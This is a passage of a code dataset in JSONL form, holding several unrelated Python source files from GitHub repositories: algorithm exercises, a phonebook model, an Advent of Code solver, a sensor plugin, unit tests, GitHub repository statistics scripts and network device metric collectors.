0\n# while True:\n# day += 1\n# go += A\n# if go >= V:\n# print(day)\n# break\n# go -= B\n#-------------------------\n# A * day - B * (day-1) => V\n# day >= (V-B)//(A-B)\nday = (V-B) / (A-B) # 막대를 모두 올라갈 때 걸리는 일수\nif day == int(day):\n print(int(day))\nelse:\n print(int(day) + 1)","repo_name":"yyyrin/Algorithm","sub_path":"BOJ/Bronze/2869.py","file_name":"2869.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"35912698318","text":"# num=int(input(\"Enter num: \"))\n# if num>0: # nested if comese in one if with another if- works based on true statement\n# if num>5:\n# print(num)\n# else:\n# print('in else')\n# else:\n# print('Out')\n\nnum=int(input(\"Enter num: \"))\nif num>0 and num>5: # or we can use if with logical operator\n print(num)\nelse:\n print('in else')\n\n","repo_name":"Shilpa-Pavithran/Python-Works","sub_path":"Flow_of_Control/Decision_Making/nestedif.py","file_name":"nestedif.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"23302745014","text":"list_db = list()\n\n\ndef get_db() -> list:\n global list_db\n return list_db\n\n\ndef set_db(db: list) -> None:\n global list_db\n list_db = db[:]\n\n\ndef open_db(path: str) -> list:\n open_dbl = list()\n my_phonebook = str\n try:\n with open(path, 'r', encoding='UTF-8') as file:\n my_phonebook = file.read()\n except:\n return []\n my_phonebook = [[word for word in strn.strip().split(';')] for strn in my_phonebook.split('\\n')]\n for i, d in enumerate(my_phonebook):\n if len(d) == 4:\n db = dict()\n db['Фамилия'] = d[0]\n db['Имя'] = d[1]\n db['Номер телефона'] = d[2]\n db['Тип номера'] = d[3]\n open_dbl.append(db)\n return open_dbl\n\n\ndef close_db(path: str) -> int:\n list_dbl = get_db()\n if len(list_dbl) == 0:\n return 0\n else:\n my_phonebook = ''\n for i, d in enumerate(list_dbl):\n strn = ''\n for value in d.values():\n strn += value + ';'\n strn = strn[:-1] + '\\n'\n my_phonebook += strn\n try:\n with open(path, 'w', encoding='UTF-8') as file:\n file.write(my_phonebook[:-1])\n except:\n return 2\n list_dbl = list()\n set_db(list_dbl)\n return 1\n\n\ndef add_new_contact(lst: list) -> None:\n if len(lst) == 4:\n dbl = get_db()\n db = dict()\n db['Фамилия'] = lst[0]\n db['Имя'] = lst[1]\n db['Номер телефона'] = lst[2]\n db['Тип номера'] = lst[3]\n dbl.append(db)\n set_db(dbl)\n\n\ndef compare_two_listcontact(old: list, new: list) -> int:\n if len(old) != len(new):\n return 0\n else:\n for i in range(len(old)):\n listoldkeys = [j for j in old[i].keys()]\n listnewkeys = [j for j in new[i].keys()]\n listoldvalues = [j for j in old[i].values()]\n listnewvalues = [j for j in new[i].values()]\n if len(listoldkeys) != len(listnewkeys) != len(listoldvalues) != len(listnewvalues):\n return 0\n else:\n for k in range(len(listoldkeys)):\n if listoldkeys[k] != listnewkeys[k]:\n return 0\n else:\n if listoldvalues[k] != listnewvalues[k]:\n return 0\n else:\n return 1\n\n\n","repo_name":"sharganow/Meeting-Python-Seminar7","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"40922274559","text":"import multiprocessing as mp\nimport re\nfrom functools import partial\nfrom typing import TypeAlias\n\nfrom timing_util import Timing\n\nCoord: TypeAlias = tuple[int, int]\n\n\ndef get_data(content: str) -> list[tuple[Coord, Coord]]:\n data = [\n tuple(\n map(int,\n re.search(r'Sensor at x=(-?\\d+), y=(-?\\d+): closest beacon is at x=(-?\\d+), y=(-?\\d+)', line).groups()))\n for line in content.splitlines()\n ]\n return [((l[0], l[1]), (l[2], l[3])) for l in data]\n\n\ndef dist(a: Coord, b: Coord) -> int:\n return sum(abs(i - j) for i, j in zip(a, b))\n\n\ndef deltoids(data: list[tuple[Coord, Coord]]) -> list[tuple[int, int, int]]:\n deltoids = []\n for s, b in data:\n d = dist(s, b)\n deltoids.append((s[1] - d, s[1] + d, s[0]))\n\n return deltoids\n\n\ndef ranges(delts: list[tuple[int, int, int]], target_y: int) -> list[tuple[int, int]]:\n # [start, end] in target_y\n ranges = []\n for (dl, dr, x) in delts:\n if dl <= target_y <= dr:\n span = min(target_y - dl, dr - target_y)\n ranges.append((x - span, x + span))\n\n return ranges\n\n\ndef part1(data: list[tuple[Coord, Coord]], target_y: int) -> int:\n\n def simplify_ranges(ranges: list[tuple[int, int]]) -> list[tuple[int, int]]:\n # sorting ranges by start\n r = sorted(ranges)\n start, end = r[0]\n rngs = []\n for s, e in r[1:]:\n # ranges are assumed to simplify down to a single one for part1\n if (start <= s <= end <= e) or (end + 1 == s):\n end = e\n elif not (start <= s and e <= end):\n rngs.append((start, end))\n start, end = s, e\n\n if not rngs or rngs[-1] != (start, end):\n rngs.append((start, end))\n\n return rngs\n\n sensors = set([s for s, _ in data])\n beacons = set([b for _, b in data])\n\n # max/min y coordinate for each sensors range\n delts = deltoids(data)\n rngs = ranges(delts, target_y)\n\n r = simplify_ranges(rngs)\n # sum of range\n n = sum(max_ - min_ + 1 for min_, max_ in r)\n\n # subtracting 'S's\n for sx, sy in sensors:\n if sy == target_y:\n for min_, max_ in r:\n if min_ <= sx <= max_:\n n -= 1\n\n # subtracting 'B's\n for bx, by in beacons:\n if by == target_y:\n for min_, max_ in r:\n if min_ <= bx <= max_:\n n -= 1\n\n return n\n\n\ndef find_part2_parallel(target_y, delts):\n # sorting ranges by start\n r = sorted(ranges(delts, target_y))\n a1, a2 = r[0]\n for b1, b2 in r[1:]:\n if (a1 <= b1 <= a2 <= b2) or (a2 + 1 == b1):\n a2 = b2\n elif not (a1 <= b1 and b2 <= a2):\n # assuming there's only a single free space, the NEXT x-coordinate has to be it\n # so we take the lower range's max and +1 to it\n return (a2 + 1) * 4000000 + target_y\n\n\ndef part2(data: list[tuple[Coord, Coord]], min_y: int, max_y: int) -> int:\n # max/min y coordinate for each sensors range\n delts = deltoids(data)\n\n func = partial(find_part2_parallel, delts=delts)\n with mp.Pool(processes=int(mp.cpu_count() * (2/3))) as pool:\n result = pool.map(func, range(min_y, max_y + 1))\n\n r = list(filter(bool, result))\n assert len(r) == 1\n return r[0]\n\n\nif __name__ == '__main__':\n with Timing():\n with open('15/input.txt') as in_file:\n data = get_data(in_file.read())\n\n print(f'part1: {part1(data, 2_000_000)}')\n print(f'part2: {part2(data, 0, 4_000_000)}')\n","repo_name":"Steve2608/AoC-2022","sub_path":"15/15.py","file_name":"15.py","file_ext":"py","file_size_in_byte":3575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"71719137437","text":"from random import randint\nfrom cyckei.plugins import cyp_base\nimport json\n\ndefault_config = json.loads(\n \"\"\"\n {\n \"name\": \"randomizer\",\n \"enabled\": true,\n \"sources\": [\n {\n \"port\": null,\n \"meta\": [1, 10]\n },\n {\n \"port\": null,\n \"meta\": [11, 20]\n }\n ]\n }\n \"\"\"\n)\n\n\nclass PluginController(cyp_base.BaseController):\n def __init__(self, sources):\n super().__init__(\n \"randomizer\",\n \"Generates random values, as an example.\"\n )\n\n # Create a randomizer object\n self.sources = self.load_sources(sources)\n self.logger.info(f\"Created {len(self.sources)} Randomizer(s)\")\n\n # List of names to declare to Cyckei\n self.names = []\n for source in self.sources:\n self.names.append(str(source))\n\n def load_sources(self, config_sources):\n \"\"\"\n Searches for available sources, and establishes source objects.\n\n Returns\n -------\n Dictionary of sources in format \"name\": SourceObject.\n \"\"\"\n\n # Sources don't need to be found for this plugin,\n # so we just initialize two randomizers as examples\n sources = {}\n for source in config_sources:\n object = PluginSource(source[\"meta\"])\n sources[object.name] = object\n\n return sources\n\n\nclass PluginSource(cyp_base.BaseSource):\n def __init__(self, range):\n super().__init__()\n self.range = range\n self.name = f\"Random {range[0]}-{range[1]}\"\n\n def read(self):\n return randint(self.range[0], self.range[1])\n\n\nif __name__ == \"__main__\":\n sources = default_config[\"sources\"]\n controller = PluginController(sources)\n print(cyp_base.read_all(controller))\n","repo_name":"cyclikal/cyp-randomizer","sub_path":"randomizer/randomizer.py","file_name":"randomizer.py","file_ext":"py","file_size_in_byte":1840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"13481011586","text":"import copy\nimport numpy as np\nimport unittest\n\nfrom ugd.help_function.graph_creation import graph_to_adj_m, adj_m_to_graph\nfrom ugd.help_function.util import get_path\nfrom ugd.schlaufen_construction.di_schlaufen_construction_util import mark_edge\nfrom test.test_resources.graphs_two_restriction_sets import graph1, graph1_adj_m\n\n\nclass HelpFunctionsAndUtil(unittest.TestCase):\n\n\n\n def test_adj_m_to_graph(self):\n adj_m = graph1_adj_m\n graph = adj_m_to_graph(adj_m, is_directed=True)\n adj_m_2 = graph_to_adj_m(graph)\n assert np.array_equal(adj_m_2 , adj_m)\n\n\n def test_graph_to_adj_m(self):\n graph = graph1\n adj_m = graph1_adj_m\n graph_copy = copy.deepcopy(graph)\n adj_m_verg = graph_to_adj_m(graph_copy)\n assert np.array_equal(adj_m_verg, adj_m)\n\n\n def test_get_path(self):\n pathgraph = copy.deepcopy(graph1)\n mark_edge(pathgraph, 3, 2, True, 1)\n mark_edge(pathgraph, 2, 1, False, 1)\n mark_edge(pathgraph, 1, 0, True, 1)\n mark_edge(pathgraph, 0, 3, False, 1)\n active_start = True\n\n path = get_path(3, active_start, pathgraph, 1)\n assert path == [3,2,1,0,3]","repo_name":"AndrinPelican/ugd","sub_path":"test/test_util_and_helpfunctions.py","file_name":"test_util_and_helpfunctions.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"51"} +{"seq_id":"72956560797","text":"from GL import *\nimport simulation\nreload(simulation)\nimport sim_colors\n\nif 1:\n sim_ms = nar(['half','1','2','3','4','5','6'])\n sim_ms_f = nar([0.5,1,2,3,4,5,6])\n sim_ma = nar(['half','1','2'])\n sim_ma_f = nar([0.5,1,2])\nif 0:\n #for kludging\n sim_ms = nar(['half','1','2','3'])\n sim_ms_f = nar([0.5,1,2,3])\n sim_ma = nar(['half','1','2'])\n sim_ma_f = nar([0.5,1,2])\n\n#color_by_mach = {'half':'c','1':'m','2':'b','3':'g','5':'r'}\ncolor_by_mach = {'half':'red','1':'orange','2':'g','3':'b','4':'violet','5':'brown','6':'black'}\nline_by_alf_mach = {'half':':','1':'--','2':'-'}\nmarker_by_alf_mach = {'half':'.','1':'^','2':'s'}\n\nplot_order=[]\ncolor={}\nlinestyle={}\nmarker={}\nglyph={}\ntdyn={}\nfor nma,ma in enumerate(sim_ma):\n for nmach,ms in enumerate(sim_ms):\n sim=\"%s_%s\"%(ms,ma)\n plot_order.append(sim)\n color[sim]=color_by_mach[ms]\n linestyle[sim]=line_by_alf_mach[ma]\n marker[sim] = marker_by_alf_mach[ma]\n #glyph = color[sim]+linestyle[sim]\n tdyn[sim] = 0.5/sim_ms_f[nmach]\n\n#auto gen, don't touch\nsimlist = nar([ '%s_%s'%(ms,ma) for ms in sim_ms for ma in sim_ma])\n\nmarkerlist = nar([ marker['%s_%s'%(ms,ma)] for ms in sim_ms for ma in sim_ma])\ncolorlist = nar([ color['%s_%s'%(ms,ma)] for ms in sim_ms for ma in sim_ma])\nlinelist = nar([ linestyle['%s_%s'%(ms,ma)] for ms in sim_ms for ma in sim_ma])\n\ndef vals_from_sim(sim):\n ms,ma = sim.split(\"_\")\n if ms == 'half':\n ms = 0.5\n if ma == 'half':\n ma = 0.5\n ms=float(ms)\n ma=float(ma)\n return ms,ma\n\nms_list=[]\nma_list=[]\nfor sim in simlist:\n ms,ma = vals_from_sim(sim)\n ms_list.append( ms)\n ma_list.append(ma)\nms_list=nar(ms_list)\nma_list=nar(ma_list)\nMs = dict(zip(simlist,ms_list))\nMa = dict(zip(simlist,ma_list))\n\ndef lrange(*args):\n return list(range(*args))\nthree_half_range = list( range(70,85))+list(range(86,93))\nanalysis_frames={\n \"half_half\":lrange(11,30)+lrange(31,32),\"half_1\":lrange(11,30)+lrange(31,32),\"half_2\":lrange(11,30)+lrange(31,32),\n \"1_half\":lrange(11,30)+lrange(31,32),\"1_1\":lrange(11,30)+lrange(31,32),\"1_2\":lrange(11,30)+lrange(31,32),\n \"2_half\":lrange(65,84)+lrange(85,86),\"2_1\":lrange(11,30)+lrange(31,32),\"2_2\":lrange(11,26)+lrange(27,32),\n #\"3_half\":lrange(72,93),\"3_1\":lrange(56,75),\"3_2\":lrange(20,40),\n \"3_half\":lrange(70,85)+lrange(90,30)+lrange(91,93),\"3_1\":lrange(53,74)+lrange(75,77),\"3_2\":lrange(9,39)+lrange(40,41),\n #'4_half':lrange(12,19), '4_1':lrange(12,22),'4_2':lrange(12,25),\n #'4_half':lrange(15,45), '4_1':lrange(15,52),'4_2':lrange(15,52),\n '4_half':lrange(14,31)+lrange(32,45), '4_1':lrange(16,23)+lrange(24,52),'4_2':lrange(15,37)+lrange(38,52),\n \"5_half\":lrange(11,40)+lrange(41,60),\"5_1\":lrange(4,37)+lrange(38,49),\"5_2\":lrange(4,46)+lrange(48,60),\"5_3\":lrange(5,59),\n '6_half':lrange(17,39)+lrange(40,46), '6_1':lrange(15,30)+lrange(31,52),'6_2':lrange(16,30)+lrange(31,52)}\n\nfor sim in simlist:\n simulation.sim(sim, data_location=dl.sim_dir_base+sim, product_location=dl.product_dir_base+sim, ms=Ms[sim], ma=Ma[sim],\n color=color[sim],linestyle=linestyle[sim],marker=marker[sim],\n framelist=analysis_frames[sim])\n","repo_name":"dcollins4096/p49d_turb_sims","sub_path":"python/simulation_info/suite_1.py","file_name":"suite_1.py","file_ext":"py","file_size_in_byte":3218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"38938515276","text":"a = -1 # 整体 int\nb = 1.2 # 浮点型 float\nc = 1 + 2j # 复数 complex\nd = True # 布尔类型 bool\ne = False # 布尔类型 bool\nf = 'abc' # 字符串 str\ng = ('a','b') # 元组 tuple\nh = [1,8,2,3] # 列表 list\nh1 = [4,7,5,6]\ni = {\"name\": \"xiaoming\", \"age\": 18} # 字典 dict\nj = set('1,2,3') # 集合 set\nl = None # None 特殊意义的空值\n\n\nprint(type(j))\n\n# ziped = list(zip(h,h1))\n# print(ziped)\n# print(list(enumerate(h)))\n# h1.remove(5)\nprint(sorted(h1))\nh.sort()\nprint(h)\n\n\n# print(h1)\n\n\n\n# print(\"hello\".center(30,\"*\"))\n","repo_name":"LinearPi/tanzhou_work_file","sub_path":"oneDay/type.py","file_name":"type.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"30753517654","text":"# -*- coding: utf-8 -*-\n# Author: Felipe Fronchetti\n# Contact: fronchettiemail@gmail.com\n\ntry:\n import os\n import csv\n import json\n import numpy\n from datetime import timedelta\n from datetime import datetime\n from collections import Counter\nexcept ImportError as error:\n raise ImportError(error)\n\nclass Indicators():\n\n def __init__(self, repository, folder):\n self.folder = folder\n\n def pulls_per_month(self):\n pull_file = json.load(open(self.folder + '/pull_requests.json', 'r'))\n pull_list = []\n opened_list = []\n merged_list = []\n closed_list = []\n\n for line in pull_file:\n pull_list.append(datetime.strptime(\n line['created_at'], '%Y-%m-%dT%H:%M:%SZ').date().replace(day=15))\n\n if line['closed_at'] is not None:\n if line['merged_at'] is not None:\n merged_date = line['merged_at']\n merged_list.append(datetime.strptime(\n merged_date, '%Y-%m-%dT%H:%M:%SZ').date().replace(day=15))\n else:\n closed_date = line['closed_at']\n closed_list.append(datetime.strptime(\n closed_date, '%Y-%m-%dT%H:%M:%SZ').date().replace(day=15))\n else:\n opened_date = line['created_at']\n opened_list.append(datetime.strptime(\n opened_date, '%Y-%m-%dT%H:%M:%SZ').date().replace(day=15))\n\n pull_ordered_list = Counter(pull_list)\n pull_ordered_list = [item[1] for item in pull_ordered_list.items()]\n\n opened_ordered_list = Counter(opened_list)\n opened_ordered_list = [item[1] for item in opened_ordered_list.items()]\n\n closed_ordered_list = Counter(closed_list)\n closed_ordered_list = [item[1] for item in closed_ordered_list.items()]\n\n merged_ordered_list = Counter(merged_list)\n merged_ordered_list = [item[1] for item in merged_ordered_list.items()]\n\n return numpy.mean(pull_ordered_list), numpy.mean(opened_ordered_list), numpy.mean(closed_ordered_list), numpy.mean(merged_ordered_list)\n\n def commits_per_month(self):\n contribution_file = open(self.folder + '/contributions.txt', 'r')\n contribution_list = []\n\n for line in contribution_file:\n contribution_date = line.strip()\n\n if contribution_date:\n contribution_list.append(datetime.strptime(\n contribution_date, '%Y-%m-%d').date().replace(day=15))\n\n contribution_ordered_list = Counter(contribution_list)\n contribution_ordered_list = [item[1]\n for item in contribution_ordered_list.items()]\n\n return numpy.mean(contribution_ordered_list)\n\n def stars_per_month(self):\n stars_file = json.load(open(self.folder + '/stars.json', 'r'))\n star_list = []\n\n for line in stars_file:\n star_date = line['starred_at']\n\n if star_date:\n star_list.append(datetime.strptime(\n star_date, '%Y-%m-%dT%H:%M:%SZ').date().replace(day=15))\n\n star_ordered_list = Counter(star_list)\n star_ordered_list = [item[1] for item in star_ordered_list.items()]\n\n return numpy.mean(star_ordered_list)\n\n def forks_per_month(self):\n forks_file = json.load(open(self.folder + '/forks.json', 'r'))\n fork_list = []\n\n for line in forks_file:\n fork_date = line['created_at']\n\n if fork_date:\n fork_list.append(datetime.strptime(\n fork_date, '%Y-%m-%dT%H:%M:%SZ').date().replace(day=15))\n\n fork_ordered_list = Counter(fork_list)\n fork_ordered_list = [item[1] for item in fork_ordered_list.items()]\n\n return numpy.mean(fork_ordered_list)\n\n def languages_counter(self):\n languages_file = json.load(open(self.folder + '/languages.json', 'r'))\n number_of_used_languages = len(languages_file)\n return number_of_used_languages\n\n def has_readme(self):\n if os.path.isfile(self.folder + '/repository/README.MD') or os.path.isfile(self.folder + '/repository/README.md') or os.path.isfile(self.folder + '/repository/README'):\n return 1\n else:\n return 0\n\n def has_contributing(self):\n if os.path.isfile(self.folder + '/repository/CONTRIBUTING.MD') or os.path.isfile(self.folder + '/repository/CONTRIBUTING.md') or os.path.isfile(self.folder + '/repository/CONTRIBUTING'):\n return 1\n else:\n return 0\n\n def has_wiki(self):\n about_file = json.load(open(self.folder + '/about.json', 'r'))\n\n if about_file['has_wiki']:\n return 1\n else:\n return 0\n\n def has_project_board(self):\n about_file = json.load(open(self.folder + '/about.json', 'r'))\n\n if about_file['has_projects']:\n return 1\n else:\n return 0\n\n def has_issue_tracker(self):\n about_file = json.load(open(self.folder + '/about.json', 'r'))\n\n if about_file['has_issues']:\n return 1\n else:\n return 0\n\nif os.path.isfile('projects.json'):\n with open('projects.json', 'r') as file:\n dictionary = json.load(file)\nelse:\n print('Error processing projects.json file.')\n print('\\033[97m\\033[1m-> A file with a projects list does not exist. \\033[0m Please, collect it first.')\n raise\n\n# In this step, we'll create the indicators data per project.\n# The respective file in the repository is data_indicators_output.csv\n\nfieldnames = ['project_name', 'pull_total_mean',\n 'pull_opened_mean', 'pull_closed_mean',\n 'pull_merged_mean', 'commits_mean',\n 'stars_mean', 'forks_mean', 'languages_count',\n 'has_readme', 'has_contributing',\n 'has_wiki', 'has_project_board', 'has_issue_tracker']\n\nwith open('data_indicators_output.csv', 'w') as statistics_file:\n writer = csv.DictWriter(statistics_file, fieldnames=fieldnames)\n writer.writeheader()\n\nfor language in dictionary.keys():\n repositories = dictionary[language]['items']\n\n for repository in repositories:\n dataset_folder = 'Dataset' + '/' + \\\n language + '/' + repository['name']\n\n A = Indicators(repository, dataset_folder)\n pull_total_mean, pull_opened_mean, pull_closed_mean, pull_merged_mean = A.pulls_per_month()\n commits_mean = A.commits_per_month()\n stars_mean = A.stars_per_month()\n forks_mean = A.forks_per_month()\n languages_count = A.languages_counter()\n has_readme = A.has_readme()\n has_contributing = A.has_contributing()\n has_wiki = A.has_wiki()\n has_project_board = A.has_project_board()\n has_issue_tracker = A.has_issue_tracker()\n\n with open('data_indicators_output.csv', 'a') as statistics_file:\n writer = csv.DictWriter(statistics_file, fieldnames=fieldnames)\n writer.writerow({'project_name': repository['name'],\n 'pull_total_mean': int(numpy.nan_to_num(pull_total_mean)),\n 'pull_opened_mean': int(numpy.nan_to_num(pull_opened_mean)),\n 'pull_closed_mean': int(numpy.nan_to_num(pull_closed_mean)),\n 'pull_merged_mean': int(numpy.nan_to_num(pull_merged_mean)),\n 'commits_mean': int(numpy.nan_to_num(commits_mean)),\n 'stars_mean': int(numpy.nan_to_num(stars_mean)),\n 'forks_mean': int(numpy.nan_to_num(forks_mean)),\n 'languages_count': languages_count,\n 'has_readme': has_readme,\n 'has_contributing': has_contributing,\n 'has_wiki': has_wiki,\n 'has_project_board': has_project_board,\n 'has_issue_tracker': has_issue_tracker})\n","repo_name":"TiagoDanin-Forks/TCC-UTFPR","sub_path":"data_indicators.py","file_name":"data_indicators.py","file_ext":"py","file_size_in_byte":8056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"40303098474","text":"from noc.sa.profiles.Generic.get_metrics import Script as GetMetricsScript, metrics\nfrom noc.core.text import parse_table\n\n\ndef convert_string(v):\n return float(v)\n\n\nclass Script(GetMetricsScript):\n name = \"Alstec.24xx.get_metrics\"\n\n SENSOR_OID_SCALE = {\n \"1.3.6.1.4.1.27142.1.2.45.1.5.6.0\": convert_string,\n \"1.3.6.1.4.1.27142.1.2.45.1.3.8.0\": convert_string,\n \"1.3.6.1.4.1.27142.1.2.45.1.3.9.0\": convert_string,\n \"1.3.6.1.4.1.27142.1.2.45.1.4.8.0\": convert_string,\n \"1.3.6.1.4.1.27142.1.2.45.1.4.10.1.2.1\": convert_string,\n \"1.3.6.1.4.1.27142.1.2.45.1.4.10.1.2.2\": convert_string,\n \"1.3.6.1.4.1.27142.1.2.45.1.4.10.1.2.3\": convert_string,\n \"1.3.6.1.4.1.27142.1.2.45.1.4.10.1.2.4\": convert_string,\n }\n\n @metrics([\"CPU | Load | 1min\"], volatile=False, access=\"C\") # CLI version\n def get_cpu_metrics(self, metrics):\n v = self.cli(\"show process cpu\")\n v = parse_table(v)\n if v:\n self.set_metric(id=(\"CPU | Load | 1min\", None), value=float(v[-1][-1][:-1]))\n\n @metrics([\"Memory | Load | 1min\"], volatile=False, access=\"C\") # CLI version\n def get_memory_metrics(self, metrics):\n try:\n v = self.cli(\"show resources\")\n except self.CLISyntaxError:\n return\n r = {}\n column = None\n for line in v.splitlines():\n if not line:\n continue\n if not line.startswith(\" \"):\n column = line.strip().lower()\n if column:\n k, v = line.split(\":\")\n r[column + k.strip().lower()] = v.strip()\n if r.get(\"ram:total\") and r.get(\"ram:used\"):\n used = int(r.get(\"ram:used\").split(\" \")[0])\n total = int(r.get(\"ram:total\").split(\" \")[0])\n self.set_metric(id=(\"Memory | Load | 1min\", None), value=round(used * 100.0 / total))\n\n @metrics(\n [\"Interface | Errors | CRC\", \"Interface | Errors | Frame\"],\n has_capability=\"DB | Interfaces\",\n volatile=False,\n matcher=\"is_builtin_controller\",\n access=\"C\", # CLI version\n )\n def get_interface_metrics(self, metrics):\n v = self.cli(\"show box-shso counters\")\n v = self.profile.parse_kv_out(v)\n metric_map = {\n \"CRC errors\": \"Interface | Errors | CRC\",\n \"Invalid frame length\": \"Interface | Errors | Frame\",\n }\n for iface in v:\n for m in metric_map:\n if m not in v[iface]:\n continue\n self.set_metric(\n id=(metric_map[m], [\"noc::interface::0/0\"]), value=int(v[iface][m]), units=\"pkt\"\n )\n\n @metrics(\n [\n \"Environment | Electric current\",\n \"Environment | Sensor Status\",\n \"Environment | Temperature\",\n \"Environment | Voltage\",\n ],\n volatile=False,\n matcher=\"is_builtin_controller\",\n access=\"C\", # CLI version\n )\n def get_boxshso_metrics(self, metrics):\n modules = {\n \"black_box\": \"show box-shso bb\",\n \"battery_pack\": \"show box-shso bp\",\n \"main_power_supply\": \"show box-shso pum\",\n }\n for module, command in modules.items():\n try:\n v = self.cli(command)\n except self.CLISyntaxError:\n continue\n v = self.profile.parse_kv_out(v)\n for m, v in v.items():\n if v == \"N/A\" or v.startswith(\"No\"):\n # Not connected sensor\n continue\n m = m.lower()\n if m.startswith(\"temperature\"):\n self.set_metric(\n id=(\"Environment | Temperature\", None),\n metric=\"Environment | Temperature\",\n labels=[\"noc::sensor::Temperature_%s\" % module],\n value=float(v.split()[0]),\n units=\"C\",\n multi=True,\n )\n elif \"voltage\" in m:\n self.set_metric(\n id=(\"Environment | Voltage\", None),\n metric=\"Environment | Voltage\",\n labels=[\"noc::sensor::Voltage_%s\" % module],\n value=float(v.split()[0]),\n units=\"VDC\",\n multi=True,\n )\n elif \"current\" in m:\n self.set_metric(\n id=(\"Environment | Electric current\", None),\n metric=\"Environment | Electric current\",\n labels=[\"noc::sensor::ElectricCurrent_%s\" % module],\n value=float(v.split()[0]) * 1000.0,\n multi=True,\n units=\"A\",\n )\n elif \"door state\" in m:\n self.set_metric(\n id=(\"Environment | Sensor Status\", None),\n metric=\"Environment | Sensor Status\",\n labels=[\"noc::sensor::State_Door\"],\n value=bool(\"Open\" in v),\n multi=True,\n )\n elif \"batteries circuit-breaker state\" in m:\n self.set_metric(\n id=(\"Environment | Sensor Status\", None),\n metric=\"Environment | Sensor Status\",\n labels=[\"noc::sensor::State_Batteries\"],\n value=bool(\"On\" in v),\n multi=True,\n )\n","repo_name":"nocproject/noc","sub_path":"sa/profiles/Alstec/24xx/get_metrics.py","file_name":"get_metrics.py","file_ext":"py","file_size_in_byte":5658,"program_lang":"python","lang":"en","doc_type":"code","stars":108,"dataset":"github-code","pt":"51"} +{"seq_id":"27377626829","text":"from unittest.mock import call\n\nfrom carebt.abstractLogger import LogLevel\nfrom carebt.behaviorTreeRunner import BehaviorTreeRunner\nfrom carebt.nodeStatus import NodeStatus\nfrom tests.fallbackNodes import AddTwoNumbersFallback1\nfrom tests.fallbackNodes import AddTwoNumbersFallback2\nfrom tests.fallbackNodes import AddTwoNumbersFallback3\nfrom tests.fallbackNodes import AddTwoNumbersFallback4\nfrom tests.fallbackNodes import AddTwoNumbersFallback5\nfrom tests.fallbackNodes import AddTwoNumbersFallback6\nfrom tests.fallbackNodes import AddTwoNumbersFallback6a\nfrom tests.fallbackNodes import AddTwoNumbersFallback7\nfrom tests.fallbackNodes import AsyncAddChildFallback\nfrom tests.fallbackNodes import RemoveAllChildrenFallback\nfrom tests.global_mock import mock\n\n########################################################################\n\n\nclass TestFallbackNode:\n \"\"\"Tests the `AddTwoNumbersFallback1`.\"\"\"\n\n ########################################################################\n\n def test_AddTwoNumbersFallback1(self):\n \"\"\"Tests the AddTwoNumbersFallback1.\"\"\"\n mock.reset_mock()\n bt_runner = BehaviorTreeRunner()\n bt_runner.run(AddTwoNumbersFallback1)\n assert mock.called\n assert bt_runner._instance.get_status() == NodeStatus.SUCCESS\n assert bt_runner._instance.get_contingency_message() == ''\n print(mock.call_args_list)\n assert mock.call_args_list == [call('__init__ AddTwoNumbersFallback1'),\n call('on_init AddTwoNumbersFallback1'),\n call('__init__ AddTwoNumbersActionWithFailure'),\n call('on_init AddTwoNumbersActionWithFailure'),\n call('AddTwoNumbersActionWithFailure: calculating: 2 + 4 = 6'), # noqa: E501\n call('on_delete AddTwoNumbersActionWithFailure'),\n call('__del__ AddTwoNumbersActionWithFailure'),\n call('on_delete AddTwoNumbersFallback1'),\n call('__del__ AddTwoNumbersFallback1')]\n\n ########################################################################\n\n def test_AddTwoNumbersFallback2(self):\n \"\"\"Tests the AddTwoNumbersFallback2.\"\"\"\n mock.reset_mock()\n bt_runner = BehaviorTreeRunner()\n bt_runner.run(AddTwoNumbersFallback2)\n assert mock.called\n assert bt_runner._instance.get_status() == NodeStatus.SUCCESS\n assert bt_runner._instance.get_contingency_message() == ''\n print(mock.call_args_list)\n assert mock.call_args_list == [call('__init__ AddTwoNumbersFallback2'),\n call('on_init AddTwoNumbersFallback2'),\n call('__init__ AddTwoNumbersActionWithFailure'),\n call('on_init AddTwoNumbersActionWithFailure'),\n call('AddTwoNumbersActionWithFailure: You did not provide two numbers!'), # noqa: E501\n call('on_delete AddTwoNumbersActionWithFailure'),\n call('__del__ AddTwoNumbersActionWithFailure'),\n call('__init__ AddTwoNumbersActionWithFailure'),\n call('on_init AddTwoNumbersActionWithFailure'),\n call('AddTwoNumbersActionWithFailure: calculating: 3 + 6 = 9'), # noqa: E501\n call('on_delete AddTwoNumbersActionWithFailure'),\n call('__del__ AddTwoNumbersActionWithFailure'),\n call('on_delete AddTwoNumbersFallback2'),\n call('__del__ AddTwoNumbersFallback2')]\n\n ########################################################################\n\n def test_AddTwoNumbersFallback3(self):\n \"\"\"Tests the AddTwoNumbersFallback3.\"\"\"\n mock.reset_mock()\n bt_runner = BehaviorTreeRunner()\n bt_runner.run(AddTwoNumbersFallback3)\n assert mock.called\n assert bt_runner._instance.get_status() == NodeStatus.SUCCESS\n assert bt_runner._instance.get_contingency_message() == ''\n print(mock.call_args_list)\n assert mock.call_args_list == [call('__init__ AddTwoNumbersFallback3'),\n call('on_init AddTwoNumbersFallback3'),\n call('__init__ AddTwoNumbersActionWithFailure'),\n call('on_init AddTwoNumbersActionWithFailure'),\n call('AddTwoNumbersActionWithFailure: You did not provide two numbers!'), # noqa: E501\n call('on_delete AddTwoNumbersActionWithFailure'),\n call('__del__ AddTwoNumbersActionWithFailure'),\n call('__init__ AddTwoNumbersActionWithFailure'),\n call('on_init AddTwoNumbersActionWithFailure'),\n 